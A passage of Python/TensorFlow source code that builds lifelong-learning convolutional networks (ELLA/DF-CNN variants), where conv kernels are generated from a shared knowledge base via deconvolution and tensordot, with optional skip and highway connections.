    """Create the three task-specific variables (deconv W, deconv bias, conv bias)."""
    suffix = str(layer_number) + '_' + str(task_number)
    var_names = ['TS_DeconvW0_' + suffix, 'TS_Deconvb0_' + suffix, 'TS_Convb0_' + suffix]
    return [
        tf.get_variable(name=var_name, shape=var_shape, dtype=tf.float32, regularizer=reg_type)
        for var_name, var_shape in zip(var_names, shape)
    ]
#### function to generate task-specific parameters for ELLA_tensorfactor layer
def new_ELLA_cnn_deconv_tensordot_TS_param(shape, layer_number, task_number, reg_type, init_tensor, trainable):
    """Create (or pass through) the four task-specific variables for the tensordot variant.

    :param shape: list of four shapes (deconv W, deconv bias, tensordot W, conv bias).
    :param init_tensor: list of four entries; None -> fresh variable,
        np.ndarray -> variable initialized from the array, anything else is
        assumed to be an existing variable and passed through unchanged.
    :param trainable: whether created variables are trainable; the final bias
        (index 3) is never regularized, nor is anything when not trainable.
    :return: list of the four variables, in the order of `shape`.
    """
    ts_w_name, ts_b_name, ts_k_name, ts_p_name = 'TS_DeconvW0_'+str(layer_number)+'_'+str(task_number), 'TS_Deconvb0_'+str(layer_number)+'_'+str(task_number), 'TS_ConvW1_'+str(layer_number)+'_'+str(task_number), 'TS_Convb0_'+str(layer_number)+'_'+str(task_number)
    params_to_return, params_name = [], [ts_w_name, ts_b_name, ts_k_name, ts_p_name]
    for i, (t, n) in enumerate(zip(init_tensor, params_name)):
        if t is None:
            params_to_return.append(tf.get_variable(name=n, shape=shape[i], dtype=tf.float32, regularizer=reg_type if trainable and i<3 else None, trainable=trainable))
        elif isinstance(t, np.ndarray):
            # isinstance instead of type(...) == np.ndarray: also accepts ndarray subclasses
            params_to_return.append(tf.get_variable(name=n, shape=shape[i], dtype=tf.float32, regularizer=reg_type if trainable and i<3 else None, trainable=trainable, initializer=tf.constant_initializer(t)))
        else:
            params_to_return.append(t)
    return params_to_return
#### function to generate task-specific parameters for ELLA_tensorfactor layer
def new_ELLA_cnn_deconv_tensordot_TS_param2(shape, layer_number, task_number, reg_type):
    """Create the five task-specific variables for the two-step tensordot variant."""
    suffix = '_' + str(layer_number) + '_' + str(task_number)
    base_names = ['TS_DeconvW0', 'TS_Deconvb0', 'TS_tdot_W1', 'TS_tdot_W2', 'TS_tdot_b0']
    return [
        tf.get_variable(name=base + suffix, shape=var_shape, dtype=tf.float32, regularizer=reg_type)
        for base, var_shape in zip(base_names, shape)
    ]
###############################################################
##### functions for adding ELLA network (CNN/Deconv ver) #####
###############################################################
#### function to generate convolutional layer with shared knowledge base
#### KB_size : [filter_height(and width), num_of_channel]
#### TS_size : deconv_filter_height(and width)
#### TS_stride_size : [stride_in_height, stride_in_width]
def new_ELLA_cnn_deconv_layer(layer_input, k_size, ch_size, stride_size, KB_size, TS_size, TS_stride_size, layer_num, task_num, activation_fn=tf.nn.relu, para_activation_fn=tf.nn.relu, KB_param=None, TS_param=None, KB_reg_type=None, TS_reg_type=None, padding_type='SAME', max_pool=False, pool_size=None, skip_connect_input=None):
    """Build one conv layer whose kernel is deconv-generated from the shared KB.

    Returns (layer_output, [KB_param], TS_param, [W, b]).
    """
    # The deconvolution of the KB must yield exactly a k_size x k_size kernel.
    assert (k_size[0] == k_size[1] and k_size[0] == (KB_size[0]-1)*TS_stride_size[0]+1), "CNN kernel size does not match the output size of Deconv from KB"
    with tf.name_scope('ELLA_cdnn_KB'):
        if KB_param is None:
            ## KB \in R^{1 \times h \times w \times c}
            KB_param = new_ELLA_KB_param([1, KB_size[0], KB_size[0], KB_size[1]], layer_num, task_num, KB_reg_type)
        if TS_param is None:
            ## TS1 : Deconv W \in R^{h \times w \times ch_in*ch_out \times c}
            ## TS2 : Deconv bias \in R^{ch_out}
            TS_param = new_ELLA_cnn_deconv_TS_param([[TS_size, TS_size, ch_size[0]*ch_size[1], KB_size[1]], [1, 1, 1, ch_size[0]*ch_size[1]], [ch_size[1]]], layer_num, task_num, TS_reg_type)
    with tf.name_scope('ELLA_cdnn_TS'):
        # Deconvolve the KB into a flat parameter map, add bias, optionally activate.
        para_tmp = tf.add(tf.nn.conv2d_transpose(KB_param, TS_param[0], [1, k_size[0], k_size[1], ch_size[0]*ch_size[1]], strides=[1, TS_stride_size[0], TS_stride_size[1], 1]), TS_param[1])
        if para_activation_fn is not None:
            para_tmp = para_activation_fn(para_tmp)
    # Reshape the generated parameters into a conv kernel [h, w, ch_in, ch_out].
    W, b = tf.reshape(para_tmp, k_size+ch_size), TS_param[2]
    layer_eqn, _ = new_cnn_layer(layer_input, k_size+ch_size, stride_size=stride_size, activation_fn=activation_fn, weight=W, bias=b, padding_type=padding_type, max_pooling=max_pool, pool_size=pool_size, skip_connect_input=skip_connect_input)
    return layer_eqn, [KB_param], TS_param, [W, b]
#### function to generate network of convolutional layers with shared knowledge base
def new_ELLA_cnn_deconv_net(net_input, k_sizes, ch_sizes, stride_sizes, KB_sizes, TS_sizes, TS_stride_sizes, activation_fn=tf.nn.relu, para_activation_fn=tf.nn.relu, KB_params=None, TS_params=None, KB_reg_type=None, TS_reg_type=None, padding_type='SAME', max_pool=False, pool_sizes=None, dropout=False, dropout_prob=None, flat_output=False, input_size=[0, 0], task_index=0, skip_connections=[]):
    """Stack new_ELLA_cnn_deconv_layer layers into a conv net with shared KB.

    Returns (layers, KB_params, TS_params, cnn_gen_params, output_dim).
    NOTE(review): `input_size=[0, 0]` and `skip_connections=[]` are mutable
    default arguments, and `skip_connections` is consumed via pop(0), so a
    caller-supplied list is mutated in place — confirm callers expect this.
    """
    _num_TS_param_per_layer = 3
    ## first element : make new KB&TS / second element : make new TS / third element : not make new para
    control_flag = [(KB_params is None and TS_params is None), (not (KB_params is None) and (TS_params is None)), not (KB_params is None or TS_params is None)]
    if control_flag[1]:
        TS_params = []
    elif control_flag[0]:
        KB_params, TS_params = [], []
    cnn_gen_params=[]
    layers_for_skip, next_skip_connect = [net_input], None
    with tf.name_scope('ELLA_cdnn_net'):
        layers = []
        # k_sizes/stride_sizes/pool_sizes hold (height, width) pairs per layer,
        # hence the len(...)//2 and the 2*layer_cnt slicing below.
        for layer_cnt in range(len(k_sizes)//2):
            next_skip_connect = skip_connections.pop(0) if (len(skip_connections) > 0 and next_skip_connect is None) else next_skip_connect
            if next_skip_connect is not None:
                skip_connect_in, skip_connect_out = next_skip_connect
                assert (skip_connect_in > -1 and skip_connect_out > -1), "Given skip connection has error (try connecting non-existing layer)"
            else:
                skip_connect_in, skip_connect_out = -1, -1
            if layer_cnt == skip_connect_out:
                # Re-apply any pooling between the skip source and destination so shapes match.
                processed_skip_connect_input = layers_for_skip[skip_connect_in]
                for layer_cnt_tmp in range(skip_connect_in, skip_connect_out):
                    if max_pool and (pool_sizes[2*layer_cnt_tmp]>1 or pool_sizes[2*layer_cnt_tmp+1]>1):
                        processed_skip_connect_input = tf.nn.max_pool(processed_skip_connect_input, ksize=[1]+pool_sizes[2*layer_cnt_tmp:2*(layer_cnt_tmp+1)]+[1], strides=[1]+pool_sizes[2*layer_cnt_tmp:2*(layer_cnt_tmp+1)]+[1], padding=padding_type)
            else:
                processed_skip_connect_input = None
            # Six cases: first layer vs later layers, crossed with the three control_flag modes.
            if layer_cnt == 0 and control_flag[0]:
                layer_tmp, KB_para_tmp, TS_para_tmp, cnn_gen_para_tmp = new_ELLA_cnn_deconv_layer(net_input, k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], KB_sizes[2*layer_cnt:2*(layer_cnt+1)], TS_sizes[layer_cnt], TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=activation_fn, para_activation_fn=para_activation_fn, KB_param=None, TS_param=None, KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], skip_connect_input=processed_skip_connect_input)
            elif layer_cnt == 0 and control_flag[1]:
                layer_tmp, _, TS_para_tmp, cnn_gen_para_tmp = new_ELLA_cnn_deconv_layer(net_input, k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], KB_sizes[2*layer_cnt:2*(layer_cnt+1)], TS_sizes[layer_cnt], TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=activation_fn, para_activation_fn=para_activation_fn, KB_param=KB_params[layer_cnt], TS_param=None, KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], skip_connect_input=processed_skip_connect_input)
            elif layer_cnt == 0 and control_flag[2]:
                layer_tmp, _, _, cnn_gen_para_tmp = new_ELLA_cnn_deconv_layer(net_input, k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], KB_sizes[2*layer_cnt:2*(layer_cnt+1)], TS_sizes[layer_cnt], TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=activation_fn, para_activation_fn=para_activation_fn, KB_param=KB_params[layer_cnt], TS_param=TS_params[_num_TS_param_per_layer*layer_cnt:_num_TS_param_per_layer*(layer_cnt+1)], KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], skip_connect_input=processed_skip_connect_input)
            elif control_flag[0]:
                layer_tmp, KB_para_tmp, TS_para_tmp, cnn_gen_para_tmp = new_ELLA_cnn_deconv_layer(layers[layer_cnt-1], k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], KB_sizes[2*layer_cnt:2*(layer_cnt+1)], TS_sizes[layer_cnt], TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=activation_fn, para_activation_fn=para_activation_fn, KB_param=None, TS_param=None, KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], skip_connect_input=processed_skip_connect_input)
            elif control_flag[1]:
                layer_tmp, _, TS_para_tmp, cnn_gen_para_tmp = new_ELLA_cnn_deconv_layer(layers[layer_cnt-1], k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], KB_sizes[2*layer_cnt:2*(layer_cnt+1)], TS_sizes[layer_cnt], TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=activation_fn, para_activation_fn=para_activation_fn, KB_param=KB_params[layer_cnt], TS_param=None, KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], skip_connect_input=processed_skip_connect_input)
            elif control_flag[2]:
                layer_tmp, _, _, cnn_gen_para_tmp = new_ELLA_cnn_deconv_layer(layers[layer_cnt-1], k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], KB_sizes[2*layer_cnt:2*(layer_cnt+1)], TS_sizes[layer_cnt], TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=activation_fn, para_activation_fn=para_activation_fn, KB_param=KB_params[layer_cnt], TS_param=TS_params[_num_TS_param_per_layer*layer_cnt:_num_TS_param_per_layer*(layer_cnt+1)], KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], skip_connect_input=processed_skip_connect_input)
            layers.append(layer_tmp)
            layers_for_skip.append(layer_tmp)
            cnn_gen_params = cnn_gen_params + cnn_gen_para_tmp
            if control_flag[1]:
                TS_params = TS_params + TS_para_tmp
            elif control_flag[0]:
                KB_params = KB_params + KB_para_tmp
                TS_params = TS_params + TS_para_tmp
            if layer_cnt == skip_connect_out:
                next_skip_connect = None
        #### flattening output
        if flat_output:
            output_dim = [int(layers[-1].shape[1]*layers[-1].shape[2]*layers[-1].shape[3])]
            layers.append(tf.reshape(layers[-1], [-1, output_dim[0]]))
        else:
            output_dim = layers[-1].shape[1:]
        #### add dropout layer
        if dropout:
            layers.append(tf.nn.dropout(layers[-1], dropout_prob))
    return (layers, KB_params, TS_params, cnn_gen_params, output_dim)
#### function to generate network of cnn->ffnn
def new_ELLA_cnn_deconv_fc_net(net_input, k_sizes, ch_sizes, stride_sizes, fc_sizes, cnn_KB_sizes, cnn_TS_sizes, cnn_TS_stride_sizes, cnn_activation_fn=tf.nn.relu, cnn_para_activation_fn=tf.nn.relu, cnn_KB_params=None, cnn_TS_params=None, fc_activation_fn=tf.nn.relu, fc_params=None, KB_reg_type=None, TS_reg_type=None, padding_type='SAME', max_pool=False, pool_sizes=None, dropout=False, dropout_prob=None, input_size=[0, 0], output_type=None, task_index=0, skip_connections=[]):
    """Compose the shared-KB conv net with a fully connected head.

    Returns (all_layers, cnn_KB_params, cnn_TS_params, cnn_gen_params, fc_params).
    NOTE(review): fc_sizes is passed as-is to new_fc_net (the commented-out
    line below used to prepend the flattened conv output dim) — confirm
    callers already include the input dimension in fc_sizes.
    """
    ## add CNN layers
    cnn_model, cnn_KB_params, cnn_TS_params, cnn_gen_params, cnn_output_dim = new_ELLA_cnn_deconv_net(net_input, k_sizes, ch_sizes, stride_sizes, cnn_KB_sizes, cnn_TS_sizes, cnn_TS_stride_sizes, activation_fn=cnn_activation_fn, para_activation_fn=cnn_para_activation_fn, KB_params=cnn_KB_params, TS_params=cnn_TS_params, KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_sizes=pool_sizes, dropout=dropout, dropout_prob=dropout_prob, flat_output=True, input_size=input_size, task_index=task_index, skip_connections=skip_connections)
    ## add fc layers
    #fc_model, fc_params = new_fc_net(cnn_model[-1], [cnn_output_dim[0]]+fc_sizes, activation_fn=fc_activation_fn, params=fc_params, output_type=output_type, tensorboard_name_scope='fc_net')
    fc_model, fc_params = new_fc_net(cnn_model[-1], fc_sizes, activation_fn=fc_activation_fn, params=fc_params, output_type=output_type, tensorboard_name_scope='fc_net')
    return (cnn_model+fc_model, cnn_KB_params, cnn_TS_params, cnn_gen_params, fc_params)
###########################################################################
##### functions for adding ELLA network (CNN/Deconv & Tensordot ver) #####
###########################################################################
#### KB_size : [filter_height(and width), num_of_channel]
#### TS_size : [deconv_filter_height(and width), deconv_filter_channel]
#### TS_stride_size : [stride_in_height, stride_in_width]
def new_ELLA_cnn_deconv_tensordot_layer(layer_input, k_size, ch_size, stride_size, KB_size, TS_size, TS_stride_size, layer_num, task_num, activation_fn=tf.nn.relu, para_activation_fn=tf.nn.relu, KB_param=None, TS_param=None, KB_reg_type=None, TS_reg_type=None, padding_type='SAME', max_pool=False, pool_size=None, skip_connect_input=None, highway_connect_type=0, highway_W=None, highway_b=None, trainable=True, trainable_KB=True):
    """Build one DF-CNN conv layer whose kernel is generated from a shared knowledge base (KB).

    The task-specific (TS) parameters first deconvolve the KB tensor up to the conv
    kernel's spatial size; a tensordot then maps the deconv channels to
    (ch_in, ch_out), producing the conv weight W, and a separate TS variable is the
    conv bias b. Optionally a HighwayNet-style gate mixes the conv output with the
    layer input.

    Arguments:
    layer_input -- input feature map of this layer
    k_size -- [kernel_height, kernel_width] of the generated conv filter (must be square)
    ch_size -- [num_input_channels, num_output_channels]
    stride_size -- strides for the conv op
    KB_size -- [KB filter height(and width), KB num_of_channel]
    TS_size -- [deconv_filter_height(and width), deconv_filter_channel]
    TS_stride_size -- [stride_in_height, stride_in_width] of the KB deconvolution
    layer_num, task_num -- indices used when naming newly created variables
    KB_param, TS_param -- existing variables to reuse (created when None)
    highway_connect_type -- 0: no highway, 1: convolutional gate, 2: single scalar gate
    trainable, trainable_KB -- trainability of the TS and KB variables respectively

    Returns:
    (layer_output, [KB_param], TS_param, [W, b], highway_params)
    """
    # the KB deconvolved with TS_stride must land exactly on the conv kernel size
    assert (k_size[0] == k_size[1] and k_size[0] == (KB_size[0]-1)*TS_stride_size[0]+1), "CNN kernel size does not match the output size of Deconv from KB"
    with tf.name_scope('ELLA_cdnn_KB'):
        ## KB \in R^{1 \times h \times w \times c}
        KB_param = new_ELLA_KB_param([1, KB_size[0], KB_size[0], KB_size[1]], layer_num, task_num, KB_reg_type, KB_param, trainable=trainable_KB)
        ## TS1 : Deconv W \in R^{h \times w \times kb_c_out \times c}
        ## TS2 : Deconv bias \in R^{kb_c_out}
        ## TS3 : tensor W \in R^{kb_c_out \times ch_in \times ch_out}
        ## TS4 : Conv bias \in R^{ch_out}
        TS_param = new_ELLA_cnn_deconv_tensordot_TS_param([[TS_size[0], TS_size[0], TS_size[1], KB_size[1]], [1, 1, 1, TS_size[1]], [TS_size[1], ch_size[0], ch_size[1]], [ch_size[1]]], layer_num, task_num, TS_reg_type, [None, None, None, None] if TS_param is None else TS_param, trainable=trainable)
    with tf.name_scope('DFCNN_param_gen'):
        # expand KB to the kernel's spatial size, then drop the leading singleton batch dim
        para_tmp = tf.add(tf.nn.conv2d_transpose(KB_param, TS_param[0], [1, k_size[0], k_size[1], TS_size[1]], strides=[1, TS_stride_size[0], TS_stride_size[1], 1]), TS_param[1])
        para_tmp = tf.reshape(para_tmp, [k_size[0], k_size[1], TS_size[1]])
        if para_activation_fn is not None:
            para_tmp = para_activation_fn(para_tmp)
        # contract the deconv channel axis against TS3 -> conv weight of shape (k, k, ch_in, ch_out)
        W = tf.tensordot(para_tmp, TS_param[2], [[2], [0]])
        b = TS_param[3]
    ## HighwayNet's skip connection
    highway_params, gate = [], None
    if highway_connect_type > 0:
        with tf.name_scope('highway_connection'):
            if highway_connect_type == 1:
                # convolutional gate with the same geometry as the main conv
                x = layer_input
                if highway_W is None:
                    highway_W = new_weight([k_size[0], k_size[1], ch_size[0], ch_size[1]])
                if highway_b is None:
                    # negative initial bias -> gate starts mostly closed
                    highway_b = new_bias([ch_size[1]], init_val=-2.0)
                gate, _ = new_cnn_layer(x, k_size+ch_size, stride_size=stride_size, activation_fn=None, weight=highway_W, bias=highway_b, padding_type=padding_type, max_pooling=False)
            elif highway_connect_type == 2:
                # single scalar gate computed from the flattened input, broadcast over the map
                x = tf.reshape(layer_input, [-1, int(layer_input.shape[1]*layer_input.shape[2]*layer_input.shape[3])])
                if highway_W is None:
                    highway_W = new_weight([int(x.shape[1]), 1])
                if highway_b is None:
                    highway_b = new_bias([1], init_val=-2.0)
                gate = tf.broadcast_to(tf.stack([tf.stack([tf.matmul(x, highway_W) + highway_b], axis=2)], axis=3), layer_input.get_shape())
            gate = tf.nn.sigmoid(gate)
        highway_params = [highway_W, highway_b]
    layer_eqn, _ = new_cnn_layer(layer_input, k_size+ch_size, stride_size=stride_size, activation_fn=activation_fn, weight=W, bias=b, padding_type=padding_type, max_pooling=max_pool, pool_size=pool_size, skip_connect_input=skip_connect_input, highway_connect_type=highway_connect_type, highway_gate=gate)
    return layer_eqn, [KB_param], TS_param, [W, b], highway_params
#### function to generate network of convolutional layers with shared knowledge base
def new_ELLA_cnn_deconv_tensordot_net(net_input, k_sizes, ch_sizes, stride_sizes, KB_sizes, TS_sizes, TS_stride_sizes, activation_fn=tf.nn.relu, para_activation_fn=tf.nn.relu, KB_params=None, TS_params=None, KB_reg_type=None, TS_reg_type=None, padding_type='SAME', max_pool=False, pool_sizes=None, dropout=False, dropout_prob=None, flat_output=False, input_size=[0, 0], task_index=0, skip_connections=[]):
    """Stack DF-CNN (KB deconv + tensordot) conv layers into a network.

    Which parameter sets are created anew is decided by whether KB_params and/or
    TS_params are given; newly created KB/TS variables are accumulated into the
    returned lists. Optional residual skip connections and a final flatten/dropout
    are applied the same way as in the other net builders of this file.

    Returns:
    (layers, KB_params, TS_params, cnn_gen_params, output_dim)
    """
    _num_TS_param_per_layer = 4
    ## create-new-parameter flags, derived from which parameter lists were supplied:
    ## [0] new KB & new TS / [1] new TS only / [2] reuse both / [3] new KB only
    control_flag = [(KB_params is None and TS_params is None), (not (KB_params is None) and (TS_params is None)), not (KB_params is None or TS_params is None), ((KB_params is None) and not (TS_params is None))]
    if control_flag[1]:
        TS_params = []
    elif control_flag[3]:
        KB_params = []
    elif control_flag[0]:
        KB_params, TS_params = [], []
    cnn_gen_params = []
    layers_for_skip, next_skip_connect = [net_input], None
    # True when the corresponding parameter set must be created inside the layer builder
    make_new_KB = control_flag[0] or control_flag[3]
    make_new_TS = control_flag[0] or control_flag[1]
    with tf.name_scope('ELLA_cdnn_net'):
        layers = []
        for layer_cnt in range(len(k_sizes)//2):
            next_skip_connect = skip_connections.pop(0) if (len(skip_connections) > 0 and next_skip_connect is None) else next_skip_connect
            if next_skip_connect is None:
                skip_connect_in, skip_connect_out = -1, -1
            else:
                skip_connect_in, skip_connect_out = next_skip_connect
                assert (skip_connect_in > -1 and skip_connect_out > -1), "Given skip connection has error (try connecting non-existing layer)"
            if layer_cnt == skip_connect_out:
                # replay the pooling applied on the main path so the stored activation matches in size
                processed_skip_connect_input = layers_for_skip[skip_connect_in]
                for in_between_cnt in range(skip_connect_in, skip_connect_out):
                    if max_pool and (pool_sizes[2*in_between_cnt]>1 or pool_sizes[2*in_between_cnt+1]>1):
                        pool_shape = [1]+pool_sizes[2*in_between_cnt:2*(in_between_cnt+1)]+[1]
                        processed_skip_connect_input = tf.nn.max_pool(processed_skip_connect_input, ksize=pool_shape, strides=pool_shape, padding=padding_type)
            else:
                processed_skip_connect_input = None
            # single call replacing the original eight-way branch: the layer input and the
            # KB/TS variables to reuse are selected up-front, all other arguments are shared
            layer_tmp, KB_para_tmp, TS_para_tmp, cnn_gen_para_tmp, _ = new_ELLA_cnn_deconv_tensordot_layer(net_input if layer_cnt < 1 else layers[layer_cnt-1], k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], KB_sizes[2*layer_cnt:2*(layer_cnt+1)], TS_sizes[2*layer_cnt:2*(layer_cnt+1)], TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=activation_fn, para_activation_fn=para_activation_fn, KB_param=None if make_new_KB else KB_params[layer_cnt], TS_param=None if make_new_TS else TS_params[_num_TS_param_per_layer*layer_cnt:_num_TS_param_per_layer*(layer_cnt+1)], KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], skip_connect_input=processed_skip_connect_input)
            layers.append(layer_tmp)
            layers_for_skip.append(layer_tmp)
            cnn_gen_params = cnn_gen_params + cnn_gen_para_tmp
            # collect only the parameter sets that were created in this call
            if make_new_KB:
                KB_params = KB_params + KB_para_tmp
            if make_new_TS:
                TS_params = TS_params + TS_para_tmp
            if layer_cnt == skip_connect_out:
                next_skip_connect = None
        #### flatten the final feature map if requested
        if flat_output:
            output_dim = [int(layers[-1].shape[1]*layers[-1].shape[2]*layers[-1].shape[3])]
            layers.append(tf.reshape(layers[-1], [-1, output_dim[0]]))
        else:
            output_dim = layers[-1].shape[1:]
        #### optional dropout on the last layer
        if dropout:
            layers.append(tf.nn.dropout(layers[-1], dropout_prob))
    return (layers, KB_params, TS_params, cnn_gen_params, output_dim)
#### function to generate network of cnn (with shared KB through deconv)-> simple ffnn
def new_ELLA_cnn_deconv_tensordot_fc_net(net_input, k_sizes, ch_sizes, stride_sizes, fc_sizes, cnn_KB_sizes, cnn_TS_sizes, cnn_TS_stride_sizes, cnn_activation_fn=tf.nn.relu, cnn_para_activation_fn=tf.nn.relu, cnn_KB_params=None, cnn_TS_params=None, fc_activation_fn=tf.nn.relu, fc_params=None, KB_reg_type=None, TS_reg_type=None, padding_type='SAME', max_pool=False, pool_sizes=None, dropout=False, dropout_prob=None, input_size=[0, 0], output_type=None, task_index=0, skip_connections=[]):
    """Build a DF-CNN (tensordot version) conv front-end followed by a fully-connected head.

    The conv part is built with flat_output=True so its last layer feeds the FC net.

    Returns:
    (all_layers, cnn_KB_params, cnn_TS_params, cnn_gen_params, fc_params)
    """
    ## convolutional front-end (shared KB, deconv + tensordot parameter generation)
    conv_layers, kb_vars, ts_vars, gen_vars, _ = new_ELLA_cnn_deconv_tensordot_net(net_input, k_sizes, ch_sizes, stride_sizes, cnn_KB_sizes, cnn_TS_sizes, cnn_TS_stride_sizes, activation_fn=cnn_activation_fn, para_activation_fn=cnn_para_activation_fn, KB_params=cnn_KB_params, TS_params=cnn_TS_params, KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_sizes=pool_sizes, dropout=dropout, dropout_prob=dropout_prob, flat_output=True, input_size=input_size, task_index=task_index, skip_connections=skip_connections)
    ## fully-connected head on top of the flattened conv output
    fc_layers, fc_vars = new_fc_net(conv_layers[-1], fc_sizes, activation_fn=fc_activation_fn, params=fc_params, output_type=output_type, tensorboard_name_scope='fc_net')
    return (conv_layers + fc_layers, kb_vars, ts_vars, gen_vars, fc_vars)
###########################################################################
##### functions for adding ELLA network (CNN/Deconv & Tensordot ver2) #####
###########################################################################
#### KB_size : [filter_height(and width), num_of_channel0, num_of_channel1]
#### TS_size : [deconv_filter_height(and width), deconv_filter_channel]
#### TS_stride_size : [stride_in_height, stride_in_width]
def new_ELLA_cnn_deconv_tensordot_layer2(layer_input, k_size, ch_size, stride_size, KB_size, TS_size, TS_stride_size, layer_num, task_num, activation_fn=tf.nn.relu, para_activation_fn=tf.nn.relu, KB_param=None, TS_param=None, KB_reg_type=None, TS_reg_type=None, padding_type='SAME', max_pool=False, pool_size=None, skip_connect_input=None):
    """Build one DF-CNN conv layer (ver2): KB carries an extra leading dim mapped to ch_in.

    The KB tensor in R^{d x h x w x c} is deconvolved spatially; two tensordots then
    contract the leading dim d against ch_in (TS3) and the deconv channels against
    ch_out (TS4), yielding the conv weight W of shape (k, k, ch_in, ch_out); TS5 is
    the conv bias.

    Arguments:
    layer_input -- input feature map of this layer
    k_size -- [kernel_height, kernel_width] of the generated conv filter (must be square)
    ch_size -- [num_input_channels, num_output_channels]
    KB_size -- [filter_height(and width), num_of_channel0 (d), num_of_channel1 (c)]
    TS_size -- [deconv_filter_height(and width), deconv_filter_channel]
    TS_stride_size -- [stride_in_height, stride_in_width] of the KB deconvolution
    layer_num, task_num -- indices used when naming newly created variables
    KB_param, TS_param -- existing variables to reuse (created when None)

    Returns:
    (layer_output, [KB_param], TS_param, [W, b])
    """
    # the KB deconvolved with TS_stride must land exactly on the conv kernel size
    assert (k_size[0] == k_size[1] and k_size[0] == (KB_size[0]-1)*TS_stride_size[0]+1), "CNN kernel size does not match the output size of Deconv from KB"
    with tf.name_scope('ELLA_cdnn_KB'):
        if KB_param is None:
            ## KB \in R^{d \times h \times w \times c}
            KB_param = new_ELLA_KB_param([KB_size[1], KB_size[0], KB_size[0], KB_size[2]], layer_num, task_num, KB_reg_type)
        if TS_param is None:
            ## TS1 : Deconv W \in R^{h \times w \times kb_c_out \times c}
            ## TS2 : Deconv bias \in R^{kb_c_out}
            ## TS3 : tensor W \in R^{d \times ch_in}
            ## TS4 : tensor W \in R^{kb_c_out \times ch_out}
            ## TS5 : Conv bias \in R^{ch_out}
            TS_param = new_ELLA_cnn_deconv_tensordot_TS_param2([[TS_size[0], TS_size[0], TS_size[1], KB_size[2]], [1, 1, 1, TS_size[1]], [KB_size[1], ch_size[0]], [TS_size[1], ch_size[1]], [1, 1, 1, ch_size[1]]], layer_num, task_num, TS_reg_type)
    with tf.name_scope('ELLA_cdnn_TS'):
        # deconvolve each of the d KB slices up to the conv kernel's spatial size
        para_tmp = tf.add(tf.nn.conv2d_transpose(KB_param, TS_param[0], [KB_size[1], k_size[0], k_size[1], TS_size[1]], strides=[1, TS_stride_size[0], TS_stride_size[1], 1]), TS_param[1])
        if para_activation_fn is not None:
            para_tmp = para_activation_fn(para_tmp)
        # contract leading KB dim d with ch_in, then deconv channels with ch_out
        para_tmp = tf.tensordot(para_tmp, TS_param[2], [[0], [0]])
        W = tf.tensordot(para_tmp, TS_param[3], [[2], [0]])
        b = TS_param[4]
    layer_eqn, _ = new_cnn_layer(layer_input, k_size+ch_size, stride_size=stride_size, activation_fn=activation_fn, weight=W, bias=b, padding_type=padding_type, max_pooling=max_pool, pool_size=pool_size, skip_connect_input=skip_connect_input)
    return layer_eqn, [KB_param], TS_param, [W, b]
#### function to generate network of convolutional layers with shared knowledge base
def new_ELLA_cnn_deconv_tensordot_net2(net_input, k_sizes, ch_sizes, stride_sizes, KB_sizes, TS_sizes, TS_stride_sizes, activation_fn=tf.nn.relu, para_activation_fn=tf.nn.relu, KB_params=None, TS_params=None, KB_reg_type=None, TS_reg_type=None, padding_type='SAME', max_pool=False, pool_sizes=None, dropout=False, dropout_prob=None, flat_output=False, input_size=[0, 0], task_index=0, skip_connections=[]):
    """Stack DF-CNN ver2 conv layers (KB with leading dim, double tensordot) into a net.

    Which parameter sets are created anew is decided by whether KB_params and/or
